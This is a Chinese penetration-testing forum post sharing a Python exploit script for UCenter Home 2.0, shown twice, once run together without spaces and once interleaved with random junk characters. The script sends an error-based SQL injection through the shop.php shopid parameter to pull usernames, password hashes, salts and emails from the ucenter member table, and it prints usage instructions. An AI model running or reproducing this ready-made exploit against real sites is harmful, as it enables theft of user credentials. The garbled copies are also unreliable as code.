找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2620|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
6 H# `7 a9 Y  T2 j/ M
, a+ x3 t1 O1 W  B
! T" G/ i0 c8 x  M#!/usr/bin/env python  
  d3 S3 w6 ^6 ?- Y( Q# d8 L( s! a 7 b: p2 Z3 [2 n$ H# p
import sys  
* E5 X+ x$ a6 U5 t* @# c, _import urllib2  , v; J6 I' E$ o0 G$ B) [
import re  
6 f* m# X9 |5 Y, B) s! _1 z1 S
. \+ ]: x$ M, S! ]0 Kdef info():  , _! Y/ G4 @" U' T# X5 h3 A
    print 'From:http://www.exploit-db.com/exploits/14997/' 4 I8 q; U& J# p7 ~/ X8 G% V
    print 'http://www.hake.cc/Web_loudong/' ( U& V, ^4 x7 Z# g6 _( S( o
    print 'changed:qiaoy'  
" V% m" x5 h6 y; q, X9 o. F, T/ H" I    print 'exp:'  1 N' J" ^- e9 e9 S6 N
    print ' ./UCenter_Home_2.0.py site'  
4 [3 e0 q/ r5 A/ N7 p
" y  g. J/ S- Mdef main():  + @: g  {4 }& h% x  c
    if len(sys.argv) != 2:  * j+ G! R9 }6 W7 T9 B1 ]$ A0 d2 p  V
        info()  
: U: E: w) n* k) K9 I0 ~/ Y    else:  : x& @$ j, m3 x; \0 _8 d. l
        site = sys.argv[1]  , H" [. p% C5 L& D- ~9 i! w" Y$ ^3 g# z
        if site[0:7] == 'http://':  3 J1 T4 K1 u* {1 |
            sitesite =site  5 Q+ R. w* C$ `. ^! R( R" V
        elif site[0:8] == 'https://':  6 D2 K0 U, Z; v1 c8 ^% f( O% L: O
            sitesite = site  ( r% X0 r0 @  r# E# X/ c: s
        else:  
% V2 w+ Z$ n6 G            site = 'http://'+site  
+ e7 W9 W8 z- E        try:  
& D" T& x  }- N3 p            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  6 Q( R$ z5 O5 B, ^/ ?; P, w: U
            Value = urllib2.urlopen(url).read()  # `  N$ M% ^2 j/ V5 S. }
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  & O0 {0 U8 F1 f2 V) T
            hacked = Msg.split(':')  2 p% H' G$ [3 ^: V
            print 'Name:    '+hacked[1]  , y- a& e0 }: u# Y5 y
            print 'Passwd:  '+hacked[2]  
8 P- g0 f+ D/ G, f1 H            print 'salt:    '+hacked[3]  
; N6 _' z+ t" n8 p9 ~" ~; N            print 'email:   '+hacked[4]  
, o* b' t4 o7 Y        except:  ( e4 i1 @" R- x* I* r7 I
            print 'Sorry,I can\'t work............'  ( O% @0 b3 u' o+ C( L3 f' {9 ^  s7 z
4 A6 f& b- p0 B. U& H
if __name__ == '__main__':  1 J3 P2 m/ ]2 r2 _' z
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表